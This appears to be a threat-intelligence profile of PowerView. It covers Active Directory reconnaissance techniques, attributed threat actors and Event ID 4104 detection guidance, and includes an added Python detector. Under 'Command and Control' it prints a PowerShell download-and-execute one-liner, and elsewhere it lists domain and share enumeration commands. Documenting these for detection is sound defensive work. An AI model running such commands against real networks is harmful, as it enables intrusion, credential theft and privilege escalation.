PowerView
PowerView is a PowerShell-based situational awareness and Active Directory enumeration framework used for post-compromise discovery in Windows domain environments. The sources collected here associate it with reconnaissance and with discovery that enables privilege escalation, notably Active Directory access control list enumeration via the cmdlets Get-ObjectAcl and Get-DomainObjectAcl, which list ACL permissions on AD objects and may reveal weak permissions that could be exploited for unauthorized access or privilege escalation. The sources also reference PowerView for discovery of accounts with Kerberos pre-authentication disabled (associated with AS-REP Roasting), constrained and unconstrained delegation discovery, Kerberos service ticket and SPN discovery (associated with Kerberoasting), and Windows file share discovery via the Invoke-ShareFinder script. PowerView is repeatedly listed alongside other offensive tools such as BloodHound, Mimikatz, Rubeus, CrackMapExec, Cobalt Strike, and adPEAS in Active Directory attack chains and detection content. The sources further state that the hacktivist group Twelve used PowerView during destructive intrusions against Russian targets. Detection guidance highlights PowerShell Script Block Logging Event ID 4104, specifically script blocks containing get-objectacl or Get-DomainObjectAcl, as an analytic for identifying PowerView ACL enumeration, and notes that legitimate administrators may also use PowerView, so detections may require tuning.
Groups observed using it
20 distinct threat actors attributed by public researchers.
Prominent among the other tools used by Twelve are Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation.
The following analytic detects the execution of the PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl, which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
Techniques & procedures
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Execution
1 technique
CTU researchers identified a variety of post-compromise tools stored under %AppData%... Powerview.ps1 — This PowerShell-based module for network reconnaissance is part of the PowerSploit penetration testing framework.
Persistence
2 techniques
Description: Manually leverage PowerView to enumerate Active Directory access control lists.
“Sandworm Team created privileged domain accounts to be used for further exploitation and lateral movement… created two new accounts, 'admin' and 'система' (System)… delegated new privileges… BlackByte created privileged domain accounts… GALLIUM created high-privileged domain user accounts to maintain access… HAFNIUM has created domain accounts… Medusa Group has created a domain account… Wizard Spider has created and used new accounts within a victim's Active Directory environment to maintain persistence.”
Privilege Escalation
2 techniques
Stealth
1 technique
Defense Impairment
1 technique
Credential Access
2 techniques
This cmdlet requests Kerberos service tickets for specified service principal names (SPNs). Monitoring this activity is crucial because it can indicate Kerberoasting, a technique used to extract SPN account passwords with cracking tools such as hashcat.
Get-DomainUser is used to identify domain users, and combining it with -PreauthNotRequired allows adversaries to discover domain accounts with Kerberos pre-authentication disabled. Red teams and adversaries alike may leverage PowerView to enumerate these accounts and attempt to crack their passwords offline.
Discovery
10 techniques
Additionally, PowerView, commonly used for network and Windows domain enumeration, was leveraged by the threat actor.
Observed activity included domain controller discovery, domain admin group enumeration, internal Exchange server discovery, LDAP enumeration, Active Directory exports using csvde.exe, PowerView-based user enumeration, and nslookup queries against internal Exchange systems.
# Invoke-ShareFinder ... Invoke-ShareFinder -CheckShareAccess
The attacker pulled 500+ computer objects with full properties and security descriptors... Every property. Security descriptors. Group memberships. Service Principal Names.
"...download ... programs to conduct reconnaissance, enumeration (PowerView)"
For example, the “Get-NetUser” cmdlet of the PowerView script allows for the enumeration of domain users within an Active Directory environment.
Atomic Test #2 - Enumerate all accounts via PowerShell (Domain) ...
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
T1087.002 - Domain Account Description from ATT&CK. Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.
The following analytic identifies the use of the Invoke-ShareFinder PowerShell cmdlet, part of PowerView. This module obtains the list of all active domain computers and lists the active shares on each computer.
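A defender-side illustration of the Event ID 4104 analytic for Get-ObjectAcl/Get-DomainObjectAcl, the Get-DomainUser -PreauthNotRequired note under Credential Access, and the Invoke-ShareFinder analytic above, as added Python that is not part of this page or of PowerView itself: it matches the cmdlet names cited on this page against constructed 4104-style records, reassembles script blocks that Script Block Logging splits across several events (a case a naive per-event match misses), and skips an assumed allowlist of sanctioned admin accounts, which is the tuning the page says such detections need. The record field names and the allowlist are assumptions for the example.

```python
"""Flag PowerView cmdlet use in PowerShell Script Block Logging (Event ID 4104)."""
import re
from collections import defaultdict

# Cmdlet names/switches are those this page cites; case-insensitive because the logged text keeps the operator's casing.
POWERVIEW_PATTERNS = {
    "AD ACL enumeration": re.compile(r"\bGet-(?:Domain)?ObjectAcl\b", re.I),
    "AS-REP roasting discovery": re.compile(r"\bGet-DomainUser\b.*?-PreauthNotRequired\b", re.I | re.S),
    "Share discovery": re.compile(r"\bInvoke-ShareFinder\b", re.I),
    "Domain user enumeration": re.compile(r"\bGet-NetUser\b", re.I),
}

def reassemble(events):
    """Rejoin fragmented script blocks: a long script is logged as several 4104
    events sharing one ScriptBlockId, ordered by MessageNumber."""
    chunks, meta = defaultdict(dict), {}
    for e in events:
        chunks[e["ScriptBlockId"]][e["MessageNumber"]] = e["ScriptBlockText"]
        meta[e["ScriptBlockId"]] = (e["Computer"], e["User"])
    for sbid, parts in chunks.items():
        computer, user = meta[sbid]
        yield sbid, computer, user, "".join(parts[n] for n in sorted(parts))

def detect_powerview(events, allowlist=frozenset()):
    """One finding per (script block, technique). `allowlist` is a hypothetical
    tuning knob: lower-cased accounts with sanctioned PowerView use are skipped."""
    findings = []
    for sbid, computer, user, text in reassemble(events):
        if user.lower() in allowlist:
            continue
        for technique, rx in POWERVIEW_PATTERNS.items():
            if rx.search(text):
                findings.append({"ScriptBlockId": sbid, "Computer": computer,
                                 "User": user, "technique": technique})
    return findings

def ev(sbid, n, total, computer, user, text):  # builds a 4104-like record
    return {"ScriptBlockId": sbid, "MessageNumber": n, "MessageTotal": total,
            "Computer": computer, "User": user, "ScriptBlockText": text}

# Constructed sample events (not real telemetry). Block b1 arrives out of order and split in two.
SAMPLE_EVENTS = [
    ev("b1", 2, 2, "WS01", "CORP\\jdoe", "ObjectAcl | Out-File C:\\Temp\\acl.txt"),
    ev("b1", 1, 2, "WS01", "CORP\\jdoe", "Import-Module .\\pv.ps1; get-domain"),
    ev("b2", 1, 1, "WS01", "CORP\\jdoe", "Get-DomainUser -PreauthNotRequired | select samaccountname"),
    ev("b3", 1, 1, "FS01", "CORP\\svc_audit", "Invoke-ShareFinder -CheckShareAccess"),
    ev("b4", 1, 1, "DC01", "CORP\\admin", "Get-ADUser -Filter * | Measure-Object"),
]
```

Running `detect_powerview(SAMPLE_EVENTS, allowlist={"corp\\svc_audit"})` yields two findings for CORP\jdoe (ACL enumeration from the reassembled b1, AS-REP discovery from b2); the allowlisted share scan and the benign Get-ADUser call produce none.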
Command and Control
1 technique
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/...')
Recent activity
7 sources tracked across advisories, community write-ups, and news.
PowerView is a PowerShell-based post-exploitation and reconnaissance tool used to enumerate Active Directory objects and permissions, including ACLs, to identify weak permissions that could enable privilege escalation or unauthorized access.
PowerView is a PowerShell tool for Active Directory reconnaissance, enumeration, and attack path discovery, used by both red teams and attackers.
PowerShell-based AD enumeration toolkit used for domain discovery and situational awareness in Windows environments.
PowerView is referenced as a tool used for Active Directory and network share discovery, including file share discovery and ACL enumeration.